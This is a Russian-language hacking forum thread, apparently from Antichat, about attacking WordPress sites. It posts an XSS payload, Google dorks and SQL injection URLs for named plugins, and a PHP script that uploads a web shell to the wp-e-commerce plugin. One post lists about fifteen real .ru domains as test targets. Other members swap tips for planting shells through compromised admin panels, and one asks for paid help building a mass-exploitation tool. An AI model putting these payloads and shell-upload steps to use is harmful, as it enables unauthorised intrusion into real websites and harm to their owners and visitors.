[ Обзор уязвимостей WordPress ]

Discussion in 'Веб-уязвимости' started by ettee, 5 Oct 2007.

  1. Mastahh

    Mastahh New Member

    Joined:
    24 Apr 2013
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Есть сайт Wordpress 3.4.1 - как узнать какие плагины стоят?
    Есть папка uploads, где видно все файлы. Значит где то есть uploader?
     
    #261 Mastahh, 25 Apr 2013
    Last edited: 25 Apr 2013
  2. strelok20094

    strelok20094 Member

    Joined:
    26 Mar 2011
    Messages:
    81
    Likes Received:
    6
    Reputations:
    2
    Просканируй сайт этой прогой Web Vulnerability Scanner 8
    там будет папка wp-content/plugins Так вот в ней и лежал плагины
     
  3. Unknowhacker

    Unknowhacker Member

    Joined:
    25 May 2013
    Messages:
    254
    Likes Received:
    35
    Reputations:
    24
    Версия 3.5 и 3.5.1
    Чтобы воспользоваться ниже упомянутой уязвимостью нужно иметь права редактора или администратора, то есть права на размещение/редактирование новостей. При размещении в тело сообщения JavaScript кода:

    Code:
    ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- </SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> 
    после чего и срабатывает уязвимость. Таким образом мы видим, что злоумышленник может получить возможность атаковать всех пользователей, которые просто зайдут почитать размещённую новость или статью. При определенных манипуляциях с кодом можно также заразить массу посетителей сайта вирусом, перенаправляя их на вредоносный сайт.
     
    #263 Unknowhacker, 31 May 2013
    Last edited: 31 May 2013
    1 person likes this.
  4. Br@!ns

    Br@!ns Elder - Старейшина

    Joined:
    3 Sep 2010
    Messages:
    915
    Likes Received:
    120
    Reputations:
    25
    все облазил) никак не получается шелл впихнуть на wp 3.3. при загрузке плагинов\тем просит FTP доступ напомнить ему. редактор не помогает. Есть варианты какие нибудь?

    EDIT
    Все мои попытки загружать медиафайлы отображаются в графе Медиафайлы (с пометкой что не прикреплены или еще что нибудь) жмем редактировать -> узнаем путь -> профит. может пригодится кому нибудь)
     
    #264 Br@!ns, 1 Jun 2013
    Last edited: 2 Jun 2013
  5. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    546
    Likes Received:
    159
    Reputations:
    324
    WordPress marker_listings.xml SQL injection

    Google dork:
    Code:
    inurl:"wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id="
    Vulnerable script:
    Code:
    h**p://WordPress.eX/wp-content/plugins/fs-real-estate-plugin/xml/marker_listings.xml?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,COLUMN_NAME,TABLE_NAME,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+FROM+INFORMATION_SCHEMA.COLUMNS+--+
     
    #265 psihoz26, 27 Jun 2013
    Last edited: 27 Jun 2013
  6. J_thief

    J_thief New Member

    Joined:
    12 Aug 2013
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    Ребят, как эксплуатировать эту уязвимость, WordPress WP-Print Plugin CSRF
    Сам плагин, версии 2.31
     
  7. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    546
    Likes Received:
    159
    Reputations:
    324
    очередная возможность узнать версию вордпресс
    файл redame.html в корневой папке с блогом

    пример
    http://www.lasalle.edu/readme.html
    http://www.blackandabroad.com/readme.html
     
    1 person likes this.
  8. BOSS

    BOSS Member

    Joined:
    15 Jun 2010
    Messages:
    86
    Likes Received:
    5
    Reputations:
    0
    Извиняюсь если не туда пишу, можно ли залить шелл на вордпресс 3.7.1 если нет прав на запись файлов?
     
  9. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,582
    Likes Received:
    173
    Reputations:
    75
    это до какой версии работало?
     
  10. Ravenous

    Ravenous Elder - Старейшина

    Joined:
    14 Jul 2012
    Messages:
    114
    Likes Received:
    27
    Reputations:
    26
    formcraft Plugin Sql Injection
    файл /wp-content/plugins/formcraft/form.php
    PHP:
    <?php 

    require('../../../wp-blog-header.php');

    global 
    $wpdb$table_subs$table_builder$table_info;
        
    $myrows $wpdb->get_results"SELECT * FROM $table_builder WHERE id=$_GET[id]""ARRAY_A" );
    $con stripslashes($myrows[0]['con']);
    $con json_decode($con1);
    inurl:"plugins/formcraft/"
     
    1 person likes this.
  11. hpol

    hpol Member

    Joined:
    11 Dec 2013
    Messages:
    62
    Likes Received:
    13
    Reputations:
    15
    какой есть еще способ залиться в wp ?
    при загрузке плагина просит пароль от ftp, имеющиеся плагины нельзя изменить, нет прав на запись.
     
  12. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,781
    Likes Received:
    854
    Reputations:
    857
    Сейчас как раз дописываю одну вещь по аплоаду в WP.

    Если есть желание и трудный сайт - помогу в рамках тестирования продукта в ПМ.
     
    _________________________
    2 people like this.
  13. vr4nonymous

    vr4nonymous New Member

    Joined:
    25 Jan 2014
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Custom Content Type Manager


    Code:
    url : http://yoursite.com/wp-content/plugins/custom-content-type-manager/ajax-controllers/download_def.php
    
    скачать .json

    вид Admin Email
     
  14. xPriZrAkx

    xPriZrAkx Member

    Joined:
    16 Mar 2007
    Messages:
    8
    Likes Received:
    8
    Reputations:
    0
    Когда просит пасс итд все равно все залилось ;) Пробуй ;)
     
  15. SuNDowN

    SuNDowN Member

    Joined:
    31 Mar 2008
    Messages:
    25
    Likes Received:
    72
    Reputations:
    -8
    Wordpress Plugin (wp-e-commerce v3.8.9.5) Multiple Vulnerabilities

    PHP:
    <?php
    $headers 
    = array("Content-Type: application/octet-stream""Content-Disposition: form-data; name=\"image\"; file=\"onlyimage.gif\";");
    $uploadfile="file.php";
    $ch curl_init("http://DOMAIN/wp-content/plugins/wp-e-commerce/wpsc-admin/includes/save-data.functions.php");
    curl_setopt($chCURLOPT_POSTtrue);
    curl_setopt($chCURLOPT_USERAGENT"Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
    curl_setopt($chCURLOPT_POSTFIELDS, array('image'=>"@$uploadfile"));
    curl_setopt($chCURLOPT_RETURNTRANSFER1);
    curl_setopt($chCURLOPT_HTTPHEADER$headers);
    $postResult curl_exec($ch);
    curl_close($ch);
    print 
    "$postResult";
    ?>
    ©Взято от Сюда

    Вот только не заливается шелл немогу понять в чём причина, кто разберется будьте добры помочь, вот Вам домены для теста:
    Code:
    http://1CCLUB.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://40MOBILE.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://4WR.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://9899669.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://AFSERVICE.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://AISBERG24.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://ALL-HTC.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://ALTERKRESLA.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://AMARTCOM.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://angel23.ru/wp-content/plugins/wp-e-commerce/readme.txt
    http://ANTIKFOREVERY1.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://APIKLIN.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://APK-NN.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://ARCHIMEDNOV.RU/wp-content/plugins/wp-e-commerce/readme.txt
    http://ARENDAMD.RU/wp-content/plugins/wp-e-commerce/readme.txt
    Домены именно той версии которую требует уязвимость.
     
  16. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,106
    Likes Received:
    797
    Reputations:
    231
    Есть админка вордпресс , как залить шелл? Редактировать файлы 404 и другие запрещено (нет прав на запись файлов темы) плагин не устанавливается( нужна авторизация FTP ) WP ниже 3.8.1
    Совет от xPriZrAkx не помог ,он просто при нажатии просит пароль и не заливает
    Способ с 2 админами тоже не катит
     
    _________________________
    #276 grimnir, 15 Feb 2014
    Last edited: 15 Feb 2014
  17. Sum.cogitans

    Sum.cogitans Elder - Старейшина

    Joined:
    7 Sep 2013
    Messages:
    173
    Likes Received:
    32
    Reputations:
    19
    Редактировать а не устанавливать плагины. Может быть проверка контрольной суммы, так что выбирать плагин с кол-вом строк >=, чем в шеле.
    P.s. Ну и сам шелл возьми из паблика, с минимальным кол-вом строк, потом свой перезальешь.
     
    2 people like this.
  18. Fooog

    Fooog Elder - Старейшина

    Joined:
    19 Sep 2008
    Messages:
    309
    Likes Received:
    170
    Reputations:
    12
    Также просит пароль от FTP? Если да, значит шелл уже залился.
     
  19. grimnir

    grimnir Members of Antichat

    Joined:
    23 Apr 2012
    Messages:
    1,106
    Likes Received:
    797
    Reputations:
    231
    BigBear помог залить шелл , огромная благодарность!
     
    _________________________
  20. McNamara

    McNamara New Member

    Joined:
    18 Nov 2013
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    хм

    Народ, а кто бы мог написать обработчик експа CKEditor 4.0 http://1337day.com/exploit/20318 ? Сорец на perl есть, с какой то ошибкой. Ну, и само собой что бы он обрабатывал по списку. ( ясен пень что не за бесплатно ) .
     
Loading...